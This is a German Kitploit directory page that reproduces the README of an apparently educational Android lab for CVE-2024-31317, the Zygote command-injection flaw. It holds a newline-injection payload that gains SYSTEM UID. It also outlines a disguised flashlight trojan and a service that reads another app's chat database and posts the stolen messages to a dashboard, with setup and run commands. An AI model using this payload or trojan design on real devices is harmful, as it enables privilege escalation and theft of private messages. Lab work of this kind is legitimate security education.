Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ZygoteExploitDemo — Pädagogische Demonstration der CVE-2024-31317 Zygote Injection Schwachstelle unter Android | Kitploit
Tools/GitHubGitHub/gitamans/zygoteexploitdemo
Android-SicherheitPrivilege EscalationSchwachstellenanalyseExploitationMobile App-PenetrationstestsPenetrationstestsMobile SicherheitLernen & BildungBinary-ExploitationLabs & Praxis
GitHubgitamans/zygoteexploitdemo
2211vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ZygoteExploitDemo

Pädagogische Demonstration der CVE-2024-31317 Zygote Injection Schwachstelle unter Android

Repository anzeigen

🔥 ZygoteExploitDemo - CVE-2024-31317 Android Sicherheitslabor

🚨 Pädagogische Demonstration der Android Zygote Injection Schwachstelle

GitHub stars GitHub forks GitHub license


📋 Übersicht

Dieses Labor demonstriert CVE-2024-31317, eine kritische Android-Sicherheitslücke, die es einer bösartigen App ermöglicht, Privilegien auf SYSTEM-Ebene (UID 1000) zu erlangen und die Android-Sandbox zu umgehen, um Daten anderer Anwendungen in Echtzeit auszulesen.

🎯 Was diese Demo zeigt


🏗️ Projektstruktur

root@kitploit:~
ZygoteExploitDemo/
├── 📱 apps/
│   ├── SecureChat/              # Victim app (Jetpack Compose)
│   │   ├── Encrypted messages stored in SQLite
│   │   └── Simulates WhatsApp-style encryption
│   │
│   ├── FlashlightPro/           # Malicious app with exploit
│   │   ├── Normal flashlight UI (distraction)
│   │   ├── Background exploit service
│   │   └── WRITE_SECURE_SETTINGS permission
│   │
│   └── MonitorService/          # SYSTEM-level reader
│       ├── Runs with UID 1000 after exploit
│       ├── Reads SecureChat database
│       └── Exfiltrates to dashboard
│
├── 📊 dashboard/                # Flask web dashboard
│   └── app.py                   # Shows stolen messages live
│
├── 📜 scripts/                  # Automation scripts
│   ├── setup_vulnerable_emulator.sh
│   ├── build_all_apps.sh
│   ├── install_all_apps.sh
│   ├── run_exploit.py
│   └── monitor_logs.sh
│
├── 🎯 exploits/                 # Exploit information
│   ├── CVE-2024-31317.md
│   └── payloads.txt
│
└── 📁 tamplates/                # Code templates
    ├── exploit_template.java
    └── dashboard_template.html

🔧 Technische Details

Die Sicherheitslücke

CVE-2024-31317 existiert in der Art und Weise, wie der Android-Zygote-Prozess die Systemeinstellung hidden_api_blacklist_exemptions verarbeitet. Aufgrund fehlender Eingabebereinigung kann ein Angreifer Zeilenumbruchzeichen injizieren, um beliebige Argumente zu Zygote-Befehlen hinzuzufügen.

Angriffsvektor:

root@kitploit:~
Settings.Global.putString(
    contentResolver,
    "hidden_api_blacklist_exemptions",
    "LClass1;->method1(\n" +
    "7\n" +
    "--setuid=1000\n" +     // Run as SYSTEM
    "--setgid=1000\n" +     // Run as SYSTEM group
    "--invoke-with\n" +
    "am start-service ...;\n"
);

Betroffene Versionen

VersionStatus
Android 9 - 14❌ Anfällig (vor Juni 2024 Patch)
Android 14+✅ Gepatcht (Sicherheitsupdate Juni 2024)
Android 15+✅ Sicher

🚀 Schnellstartanleitung

Voraussetzungen

  • ✅ Android Studio (neueste Version)
  • ✅ Python 3.8+ mit Flask
  • ✅ Android SDK mit Platform-Tools
  • ✅ 10 GB freier Festplattenspeicher für den Emulator

Schritt 1: Repository klonen

root@kitploit:~
git clone https://github.com/GitAmanS/ZygoteExploitDemo.git
cd ZygoteExploitDemo

Schritt 2: Verwundbaren Emulator einrichten

root@kitploit:~
cd scripts
chmod +x *.sh
./setup_vulnerable_emulator.sh

# Start the emulator
emulator -avd vulnerable_android_12

Schritt 3: Apps erstellen und installieren

root@kitploit:~
# In a new terminal
cd ZygoteExploitDemo/scripts
./build_all_apps.sh
./install_all_apps.sh

Schritt 4: Dashboard starten

root@kitploit:~
cd ../dashboard
pip3 install flask flask-cors
python3 app.py

📱 Öffnen Sie http://localhost:5000 in Ihrem Browser

Schritt 5: Exploit ausführen

root@kitploit:~
cd ../scripts
python3 run_exploit.py

Schritt 6: Die Magie beobachten ✨

  1. Öffnen Sie die SecureChat-App im Emulator
  2. Senden Sie einige Testnachrichten
  3. Beobachten Sie, wie sie sofort! 🔴 im Dashboard erscheinen

📸 Demo-Video

🎬 Demo-Video folgt in Kürze


🔬 So funktioniert es - Schritt für Schritt

  1. FlashlightPro fordert die Berechtigung WRITE_SECURE_SETTINGS an
  2. Exploit-Code injiziert schädliche Payload in Zygote-Einstellungen
  3. Zygote erzeugt MonitorService mit SYSTEM-Privilegien (UID 1000)
  4. SYSTEM-Dienst umgeht Android-Sandbox-Beschränkungen
  5. Direktes Auslesen der Datenbank aus /data/data/com.securechat/databases/
  6. Exfiltration zum Flask-Dashboard per HTTP POST
  7. Echtzeitanzeige gestohlener verschlüsselter Nachrichten

📚 Lernressourcen

  • Android Security Bulletins
  • CVE-2024-31317 Details
  • Original PoC von CleoV2

🤝 Mitwirken

Beiträge sind willkommen! Bitte:

  1. Repository forken
  2. Einen Feature-Branch erstellen
  3. Einen Pull-Request einreichen

Bereiche für Beiträge:

  • 🎯 Zusätzliche Exploit-Payloads
  • 🛡️ Bessere Erkennungsmethoden
  • 📖 Verbesserte Dokumentation
  • 🌍 Übersetzung in andere Sprachen

📄 Lizenz

MIT-Lizenz – Siehe LICENSE Datei für Details


👨‍💻 Autor

Aman - @GitAmanS


⭐ Unterstützung

Wenn Sie dies lehrreich fanden, geben Sie bitte einen Stern! ⭐


Für Sicherheitsforscher gemacht, von einem Sicherheitsforscher

Denken Sie daran: Mit großer Macht kommt große Verantwortung 🕷️

Tool herunterladen
StufeBeschreibungVisual
1Benutzer installiert harmlos aussehende "Flashlight Pro" App🔦
2App nutzt CVE-2024-31317 aus, um SYSTEM-Zugriff zu erlangen💉
3SYSTEM-Dienst liest "SecureChat"-Nachrichten👁️
4Gestohlene Nachrichten erscheinen im Live-Dashboard📊